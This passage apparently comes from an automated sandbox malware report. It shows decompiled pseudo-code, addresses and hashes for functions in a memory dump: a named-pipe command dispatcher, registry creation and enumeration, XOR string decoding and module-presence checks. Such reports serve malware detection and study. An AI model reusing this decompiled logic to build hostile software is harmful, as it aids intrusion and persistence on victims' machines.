									asm("stosd");
									asm("stosd");
									_t206 =  *0x361e684; // 0x530f6c8
									 *((intOrPtr*)(_t206 + 0xd8))( &_v608);
									_t210 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t210;
									_t245 = 0x3c;
									_v632 = _t210 / _t245 + _v604 & 0x0000ffff;
									_t322 = E036085EA(0x1000);
									_v624 = _t322;
									_pop(_t276);
									__eflags = _t322;
									if(_t322 != 0) {
										_t215 = E036095C7(_t276, 0x32d);
										_t278 =  *0x361e688; // 0x33f0000
										_push(_t278 + 0x228);
										_push(_v628 % _t245 & 0x0000ffff);
										_v636 = _t215;
										E03609626(_t322, 0x1000, _t215, _v632 & 0x0000ffff);
										E036085BB( &_v636);
										E0360A8F7(_t322, 0, 0xbb8, 1);
										E03608600( &_v624, 0xfffffffe);
									}
									goto L42;
								}
							}
						} else {
							_t233 =  *((intOrPtr*)(_t258 + 0x214));
							__eflags = _t233 - 3;
							if(_t233 == 3) {
								goto L19;
							}
							__eflags =  *((intOrPtr*)(_t258 + 4)) - 6;
							if( *((intOrPtr*)(_t258 + 4)) >= 6) {
								L37:
								_t142 = E036095C7(_t258, 0x610);
								_push(_t242);
								_push(_t142);
								_v616 = _t142;
								_t143 =  *0x361e688; // 0x33f0000
								_t326 = E036092CB(_t143 + 0x228);
								_v612 = _t326;
								__eflags = _t326;
								if(_t326 != 0) {
									_t158 = E0360B24F(_t326);
									__eflags = _t158;
									if(_t158 != 0) {
										_t161 =  *0x361e684; // 0x530f6c8
										 *((intOrPtr*)(_t161 + 0x10c))(_t326);
									}
									E03608600( &_v612, 0xfffffffe);
								}
								E036085BB( &_v616);
								_t148 =  *0x361e688; // 0x33f0000
								lstrcpynW(_t148 + 0x438,  *0x361e740, 0x20a);
								_t151 =  *0x361e688; // 0x33f0000
								_t152 = _t151 + 0x228;
								__eflags = _t152;
								lstrcpynW(_t152,  *0x361e738, 0x20a);
								_t328 =  *0x361e688; // 0x33f0000
								_t115 = _t328 + 0x228; // 0x33f0228
								 *((intOrPtr*)(_t328 + 0x434)) = E03608FA4(_t115, __eflags);
								E03608600(0x361e740, 0xfffffffe);
								E03608600(0x361e738, 0xfffffffe);
								L42:
								_t157 = 0;
								__eflags = 0;
								L43:
								return _t157;
							}
							__eflags = _t233 - 2;
							if(_t233 != 2) {
								goto L37;
							}
							goto L19;
						}
					}
					L9:
					_t157 = _t120 | 0xffffffff;
					goto L43;
				}
				_t246 = E036095AD(0x6e2);
				_v616 = _t246;
				_t323 = E036095AD(0x9f5);
				_v612 = _t323;
				if(_t246 == 0 || _t323 == 0) {
					L7:
					_t242 = 0;
					goto L8;
				} else {
					if(GetModuleHandleA(_t246) != 0 || GetModuleHandleA(_t323) != 0) {
						_v620 = 1;
					}
					E036085A8( &_v616);
					_t120 = E036085A8( &_v612);
					if(_v620 != 0) {
						goto L9;
					}
					goto L7;
				}
			}

0x03604d6e
0x03604d74
0x03604d7a
0x03604d81
0x03604d83
0x03604d8d
0x03604d91
0x03604df2
0x03604dfb
0x03604e04
0x03604e07
0x03604e0e
0x03604e13
0x03604e18
0x03604e1f
0x03604e29
0x03604e30
0x03604e3b
0x03604e40
0x03604e47
0x03604e4d
0x03604e4e
0x03604e4f
0x03604e53
0x03604e5e
0x03604e66
0x03604e6c
0x03604e71
0x03604e79
0x03604e7e
0x03604e80
0x03604e88
0x03604e8f
0x03604e91
0x03604e99
0x03604e93
0x03604e93
0x03604e93
0x03604e9e
0x03604ea1
0x03604ea1
0x03604eae
0x03604eb3
0x03604ec1
0x03604ec9
0x03604ece
0x03604ed7
0x03604ede
0x03604efe
0x03604f04
0x03604f05
0x03604f06
0x03604f07
0x03604f08
0x03604f09
0x03604f13
0x03604f17
0x03604f1c
0x03604f1f
0x03604f21
0x03604f31
0x03604f31
0x03604f37
0x03604f3e
0x03604f43
0x03604f49
0x03604f50
0x03604f53
0x03604f55
0x03604f60
0x03604f65
0x03604f6a
0x03604f6f
0x03604f6f
0x03604f72
0x03604f79
0x00000000
0x03604f7f
0x03604f7f
0x03604f84
0x03604f87
0x03604f89
0x03604f8c
0x03604f8e
0x03604f94
0x03604f94
0x03604f8e
0x03604f96
0x03604f9b
0x03604fa1
0x03604fa4
0x00000000
0x03604faa
0x03604faa
0x03604fae
0x03605083
0x0360508a
0x00000000
0x00000000
0x03605090
0x0360509b
0x0360509c
0x0360509d
0x0360509e
0x036050a4
0x036050a9
0x036050af
0x036050b7
0x036050c0
0x036050c3
0x036050d2
0x036050d9
0x036050dc
0x036050ea
0x036050ee
0x036050f3
0x036050f7
0x036050f8
0x036050fa
0x03605105
0x0360510a
0x03605117
0x0360511b
0x0360511c
0x0360511e
0x03605126
0x03605127
0x0360512c
0x03605149
0x0360514e
0x03605152
0x03605154
0x03605167
0x03605171
0x03605175
0x0360517d
0x0360517e
0x03605187
0x03605188
0x0360518d
0x03605199
0x036051a3
0x036051b5
0x036051c1
0x036051c6
0x036051d0
0x036051d6
0x00000000
0x036050fa
0x03604fb4
0x03604fb7
0x00000000
0x00000000
0x03604fbd
0x03604fc8
0x03604fc9
0x03604fca
0x03604fcb
0x03604fd1
0x03604fd6
0x03604fe5
0x03604fea
0x03604fee
0x03604ffd
0x03605006
0x03605008
0x0360500c
0x0360500d
0x0360500f
0x0360501a
0x0360502e
0x0360503d
0x03605041
0x0360504a
0x0360504e
0x03605058
0x0360506a
0x03605076
0x0360507b
0x00000000
0x0360500f
0x03604fa4
0x03604ee0
0x03604ee0
0x03604ee6
0x03604ee9
0x00000000
0x00000000
0x03604eeb
0x03604eef
0x036051dc
0x036051e1
0x036051e7
0x036051e8
0x036051e9
0x036051ed
0x036051fd
0x03605202
0x03605206
0x03605208
0x0360520c
0x03605211
0x03605213
0x03605215
0x0360521b
0x0360521b
0x03605228
0x0360522e
0x03605234
0x03605239
0x03605257
0x03605259
0x03605265
0x03605265
0x0360526b
0x0360526d
0x03605273
0x03605285
0x0360528b
0x03605297
0x0360529f
0x0360529f
0x0360529f
0x036052a1
0x036052a7
0x036052a7
0x03604ef5
0x03604ef8
0x00000000
0x00000000
0x00000000
0x03604ef8
0x03604ede
0x03604e21
0x03604e21
0x00000000
0x03604e21
0x03604d9d
0x03604da4
0x03604dad
0x03604daf
0x03604db5
0x03604df0
0x03604df0
0x00000000
0x03604dbb
0x03604dc6
0x03604dcf
0x03604dcf
0x03604ddb
0x03604de4
0x03604dee
0x00000000
0x00000000
0x00000000
0x03604dee

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 03604DC2
GetModuleHandleA.KERNEL32(00000000), ref: 03604DC9
lstrcpynW.KERNEL32(033EFBC8,0000020A,?,?,?,?,?,?,?,?,?,00000000), ref: 03605257
lstrcpynW.KERNEL32(033EFDD8,0000020A,?,?,?,?,?,?,?,?,?,00000000), ref: 0360526B

Part of subcall function 0360B24F: GetFileAttributesW.KERNELBASE(00000000,03604E7E,?,00000000), ref: 0360B255

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: HandleModulelstrcpyn$AttributesFile
String ID:
API String ID: 1754255865-0
Opcode ID: f88d7c5fc7cc4df649d399531c960682cc6185d08d89037893365631d5f45499
Instruction ID: 2ab1c5bb92f87d0dd040db945c4823ef7191b131bcb79b667199e8d9b188b202
Opcode Fuzzy Hash: f88d7c5fc7cc4df649d399531c960682cc6185d08d89037893365631d5f45499
Instruction Fuzzy Hash: 6FE1FF71508301AFE318EF68D886E6BB3E9EF89314F48092EF645CB2D0DB71D9158B56

Uniqueness

Uniqueness Score: -1.00%

Function 03609B29, Relevance: 6.3, APIs: 4, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E03609B29(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				void* _t91;
				char* _t92;
				long _t96;
				int* _t97;
				int* _t101;
				long _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E036085EA(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E0360B5DC(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E036095AD(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0x361e688; // 0x33f0000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E03609278(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0x361e68c; // 0x530f890
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E03609278(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0x361e688; // 0x33f0000
						_t128 =  *0x361e68c; // 0x530f890
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0x361e68c; // 0x530f890
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E036085A8( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								RegCloseKey();
								_t155[0x43] = _v8;
								_t101 = E0360C384(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E03608600( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E03608600( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E03608600( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E03609278(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0x361e68c; // 0x530f890
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0x361e68c; // 0x530f890
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E036095C7( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E036092CB(_v32);
							_v32 = _t179;
							E036085BB( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E0360923C(_v12);
							_v24 = _t147;
							_t148 =  *0x361e68c; // 0x530f890
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E03608600( &_v32, 0xfffffffe);
							E03608600( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E03609278(_v12);
						_t171 =  *0x361e684; // 0x530f6c8
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E03608600( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}

0x03609b32
0x03609b34
0x03609b37
0x03609b39
0x03609b41
0x03609b44
0x03609b4b
0x03609b53
0x03609b55
0x03609b5b
0x03609b64
0x03609b6c
0x03609b72
0x03609b79
0x03609b7f
0x03609b81
0x03609b84
0x03609b86
0x03609b86
0x03609b86
0x03609b8e
0x03609b91
0x03609b96
0x03609b99
0x03609b9c
0x03609b9e
0x03609cd4
0x03609cd4
0x03609cda
0x03609ce1
0x03609d22
0x03609d26
0x03609d27
0x03609d2d
0x03609d32
0x03609d35
0x03609d35
0x03609d37
0x00000000
0x03609d37
0x03609ce6
0x03609cf0
0x03609cf9
0x03609cfe
0x03609d01
0x03609d04
0x00000000
0x00000000
0x03609d06
0x03609d0a
0x03609d0b
0x03609d10
0x03609d11
0x03609d14
0x03609d18
0x03609d1d
0x00000000
0x03609ba4
0x03609ba4
0x03609bb1
0x03609bb7
0x03609bba
0x03609bbc
0x03609cd1
0x00000000
0x03609cd1
0x03609bc5
0x03609bc9
0x03609bd1
0x03609bd8
0x03609bdb
0x03609bde
0x03609d3a
0x03609d3d
0x03609d55
0x03609d58
0x03609d5a
0x03609dae
0x03609db1
0x03609db3
0x03609db5
0x03609db5
0x03609dbb
0x03609dbe
0x03609dc3
0x03609dca
0x03609dd0
0x03609dd5
0x03609dd8
0x03609dda
0x03609df1
0x03609df7
0x00000000
0x00000000
0x00000000
0x00000000
0x03609ddc
0x03609ddc
0x03609de8
0x03609dec
0x03609ded
0x03609ded
0x00000000
0x03609ddc
0x03609d5f
0x03609d6c
0x03609d6f
0x03609d71
0x03609da0
0x03609da3
0x03609da5
0x03609da7
0x03609da7
0x03609da9
0x00000000
0x03609da9
0x03609d73
0x03609d7c
0x03609d88
0x03609d93
0x00000000
0x03609d98
0x03609be4
0x03609be5
0x03609be8
0x03609bed
0x03609bf1
0x03609bf6
0x03609bf9
0x03609bfc
0x03609bfe
0x00000000
0x00000000
0x03609c0f
0x03609c17
0x03609c1a
0x03609c1c
0x03609c91
0x03609c99
0x03609c1e
0x03609c20
0x03609c2f
0x03609c37
0x03609c3d
0x03609c40
0x03609c48
0x03609c4b
0x03609c55
0x03609c58
0x03609c5d
0x03609c60
0x03609c62
0x03609c64
0x03609c67
0x03609c69
0x03609c6b
0x03609c6b
0x03609c69
0x03609c77
0x03609c82
0x03609c87
0x03609c8a
0x03609c8a
0x03609ca9
0x03609cae
0x03609cb4
0x03609cb7
0x03609cb9
0x03609cbf
0x03609cc8
0x00000000
0x03609cce
0x03609b9e
0x03609b5d
0x00000000

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bd30b8ee0378fb85fc0e1f0d44d5b8e15fbd50c0c4f88472c7668a3ceb9bfcbc
Instruction ID: 02b21cf7a34c914def7ae5c74348a39f7c477c39f3b7314360498a8aef835ba9
Opcode Fuzzy Hash: bd30b8ee0378fb85fc0e1f0d44d5b8e15fbd50c0c4f88472c7668a3ceb9bfcbc
Instruction Fuzzy Hash: 45916BB5900209AFCF18DFA4CC45DEFBBB9EF09310F184159E915AB2A6D7319A10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 03603296, Relevance: 6.2, APIs: 4, Instructions: 189
pipeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E03603296() {
				char _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr* _v40;
				char _v168;
				char _v172;
				intOrPtr _t41;
				void* _t47;
				char _t54;
				char _t61;
				intOrPtr _t64;
				void* _t65;
				void* _t68;
				void* _t70;
				void* _t72;
				void* _t76;
				struct _OVERLAPPED* _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed short* _t86;
				intOrPtr* _t97;
				signed short* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr* _t112;
				struct _OVERLAPPED* _t113;
				char _t114;
				void* _t115;

				_t113 = 0;
				_t82 = 0;
				_v8 = 0;
				_v12 = 0;
				while(1) {
					_v16 = _t113;
					if(ConnectNamedPipe( *0x361e674, _t113) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(_t113);
					_push( &_v16);
					_t41 =  *0x361e684; // 0x530f6c8
					_push(0x80000);
					_push( *0x361e724);
					_push( *0x361e674);
					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
						GetLastError();
					} else {
						_t86 =  *0x361e724; // 0x57e7020
						_t47 = ( *_t86 & 0x0000ffff) - 1;
						if(_t47 == 0) {
							_t112 = E036093A4( &(_t86[4]), 0x20, 1,  &_v24);
							_v40 = _t112;
							if(_t112 != 0) {
								_t114 = _v24;
								if(_t114 <= 1) {
									_t113 = 0;
									_t54 = E03601DA0(E0360972F( *_t112), 0, 0, 0);
									_t115 = _t115 + 0x10;
									_v172 = _t54;
								} else {
									_v36 = _t114 - 1;
									_t83 = E036085EA(_t114 - 1 << 2);
									_v32 = _t83;
									if(_t83 == 0) {
										_t113 = 0;
									} else {
										if(_t114 > 1) {
											_v20 = _t83;
											_t84 = 1;
											do {
												_t64 = E0360918C( *((intOrPtr*)(_t112 + _t84 * 4)), E0360C384( *((intOrPtr*)(_t112 + _t84 * 4))));
												_t97 = _v20;
												_t84 = _t84 + 1;
												 *_t97 = _t64;
												_v20 = _t97 + 4;
											} while (_t84 < _t114);
											_t83 = _v32;
										}
										_t113 = 0;
										_t61 = E03601DA0(E0360972F( *_t112), _t83, _v36, 0);
										_t115 = _t115 + 0x10;
										_v172 = _t61;
										E0360949D( &_v24);
									}
									_t82 = _v12;
								}
							}
							_t105 =  *0x361e724; // 0x57e7020
							E036096B0( &_v168,  &(_t105[4]), 0x80);
							_push(0x84);
							_push( &_v172);
							_push(2);
							goto L33;
						} else {
							_t65 = _t47 - 3;
							if(_t65 == 0) {
								_push(_t113);
								_push(_t113);
								_t108 = 5;
								E0360C324(_t108);
								 *0x361e758 = 1;
								_t82 = 1;
								_v12 = 1;
							} else {
								_t68 = _t65;
								if(_t68 == 0) {
									_t70 = E0360F7AA( &_v8);
									goto L13;
								} else {
									_t72 = _t68 - 1;
									if(_t72 == 0) {
										E0360F7AA( &_v8);
										goto L16;
									} else {
										_t76 = _t72 - 1;
										if(_t76 == 0) {
											_t70 = E0360F7CC( &_v8);
											L13:
											if(_t70 == 0) {
												_push(_t113);
												_push(_t113);
												_push(0xa);
											} else {
												_push(_v8);
												_push(_t70);
												_push(5);
											}
											_pop(_t109);
											E0360C324(_t109);
										} else {
											if(_t76 == 1) {
												E0360F7CC( &_v8);
												L16:
												_push(4);
												_push( &_v8);
												_push(5);
												L33:
												_pop(_t107);
												E0360C324(_t107);
												_t115 = _t115 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					DisconnectNamedPipe( *0x361e674);
					if(_t82 == 0) {
						continue;
					}
					break;
				}
				return 0;
			}

0x036032a1
0x036032a3
0x036032a5
0x036032a9
0x036032ac
0x036032b8
0x036032c3
0x00000000
0x00000000
0x036032d6
0x036032da
0x036032db
0x036032e0
0x036032e5
0x036032eb
0x036032f9
0x0360349d
0x03603309
0x03603309
0x03603312
0x03603315
0x036033bd
0x036033bf
0x036033c6
0x036033cc
0x036033d2
0x0360344b
0x03603456
0x0360345b
0x0360345e
0x036033d4
0x036033d7
0x036033e3
0x036033e5
0x036033eb
0x03603466
0x036033ed
0x036033f2
0x036033f4
0x036033f7
0x036033f9
0x03603407
0x0360340c
0x0360340f
0x03603410
0x03603415
0x03603418
0x0360341c
0x0360341c
0x03603421
0x0360342e
0x03603433
0x03603436
0x03603442
0x03603442
0x03603468
0x03603468
0x036033d2
0x0360346b
0x0360347f
0x03603484
0x0360348f
0x03603490
0x00000000
0x0360331b
0x0360331b
0x0360331e
0x0360338c
0x0360338d
0x03603390
0x03603391
0x03603398
0x036033a3
0x036033a5
0x03603320
0x03603321
0x03603324
0x03603374
0x00000000
0x03603326
0x03603326
0x03603329
0x0360335e
0x00000000
0x0360332b
0x0360332b
0x0360332e
0x03603348
0x0360334d
0x03603350
0x0360337b
0x0360337c
0x0360337d
0x03603352
0x03603352
0x03603355
0x03603356
0x03603356
0x0360337f
0x03603380
0x03603330
0x03603333
0x0360333d
0x03603363
0x03603363
0x03603368
0x03603369
0x03603492
0x03603492
0x03603493
0x03603498
0x03603498
0x03603333
0x0360332e
0x03603329
0x03603324
0x0360331e
0x03603315
0x036034a9
0x036034b1
0x00000000
0x00000000
0x00000000
0x036034b1
0x036034bd

APIs

ConnectNamedPipe.KERNELBASE(00000000), ref: 036032BB
GetLastError.KERNEL32 ref: 036032C5

Part of subcall function 0360C324: FlushFileBuffers.KERNEL32(000003BC,?,?,?,03603498,?,00000084,00000080), ref: 0360C36A

DisconnectNamedPipe.KERNEL32 ref: 036034A9

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
String ID:
API String ID: 2389948835-0
Opcode ID: 4dc74f5bb4c94b974017621dfd13539b386bbac529d99ee07e8d3ff97265e222
Instruction ID: c0a093ef65bb20c359078393654153377ec9d1784a73bf7aa1501edf7dcdeff2
Opcode Fuzzy Hash: 4dc74f5bb4c94b974017621dfd13539b386bbac529d99ee07e8d3ff97265e222
Instruction Fuzzy Hash: 1951E639D00315ABDB19EFB4D98AAAFB7B8EB05311F28012AE505DB3C4DB35D904CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0360619A, Relevance: 6.1, APIs: 4, Instructions: 145
registryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0360619A(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				void* _t53;
				intOrPtr _t63;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t53 = E036085EA(0x3fff); // executed
				_t98 = _t53;
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E036085EA(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						_t63 =  *0x361e68c; // 0x530f890
						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
					}
					E03608600( &_v32, 0x3fff); // executed
					E03608600( &_v36, 0x800); // executed
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0x361e68c; // 0x530f890
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0x361e68c; // 0x530f890
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0x361e690; // 0x530f968
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0x361e68c; // 0x530f890
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E0360C39D(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E0360B197(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0x361e68c; // 0x530f890
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}

0x0360619a
0x0360619a
0x036061a6
0x036061b5
0x036061b8
0x036061c2
0x036061ca
0x036061cd
0x036061d0
0x036061d5
0x036061d7
0x036061da
0x036061df
0x0360634b
0x0360634f
0x0360634f
0x036061ef
0x036061f1
0x036061f7
0x00000000
0x00000000
0x0360621a
0x03606319
0x0360631d
0x0360631f
0x03606327
0x03606327
0x03606333
0x03606341
0x00000000
0x03606346
0x03606223
0x03606227
0x0360622b
0x0360622f
0x03606233
0x03606234
0x03606235
0x03606236
0x03606237
0x0360623b
0x03606242
0x03606243
0x03606248
0x03606253
0x03606268
0x0360626a
0x00000000
0x00000000
0x03606270
0x03606273
0x0360627b
0x03606288
0x0360628d
0x03606290
0x03606299
0x036062a0
0x036062b0
0x036062ba
0x036062c0
0x036062c2
0x036062c7
0x036062d0
0x036062d2
0x036062d4
0x036062d6
0x036062e0
0x036062e6
0x036062ea
0x036062ee
0x036062f3
0x036062f9
0x036062fb
0x036062fd
0x036062fd
0x03606304
0x03606304
0x036062ea
0x03606309
0x03606309
0x0360630c
0x0360630d
0x03606310
0x03606310
0x00000000
0x03606273
0x03606255
0x0360625d
0x00000000

APIs

memset.MSVCRT ref: 036061B8

Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8

RegOpenKeyExW.KERNELBASE(?,?,00000000,0002001F,?,?,?,00000001), ref: 03606212
memset.MSVCRT ref: 0360627B
memset.MSVCRT ref: 03606288

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: memset$AllocateHeapOpen
String ID:
API String ID: 2508404634-0
Opcode ID: 1ed09117f89761408ec81c79fa0b5a7014ee93974067b86f58a660e6074b9c1a
Instruction ID: 8af98f8aa2543e60ff0c285946798f05793940231451957207e120e2865ec9ab
Opcode Fuzzy Hash: 1ed09117f89761408ec81c79fa0b5a7014ee93974067b86f58a660e6074b9c1a
Instruction Fuzzy Hash: DA513B71900209AFDB19EFA4CD86FAFBBBCEF04300F144069F505EB285D7309A148BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0360BF42, Relevance: 6.1, APIs: 4, Instructions: 72
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0360BF42(short* __edx, short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				char* _t30;
				intOrPtr _t31;
				char* _t49;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
						L6:
						if(_v8 != 0) {
							_t31 =  *0x361e68c; // 0x530f890
							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
						}
						_t30 = 0;
						L9:
						return _t30;
					}
					_t49 = E036085EA(_v12);
					_v20 = _t49;
					if(_t49 == 0) {
						goto L6;
					}
					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
						RegCloseKey(_v8);
						_t30 = _t49;
						goto L9;
					}
					E03608600( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}

0x0360bf60
0x0360bf63
0x0360bf66
0x0360bf71
0x0360bf95
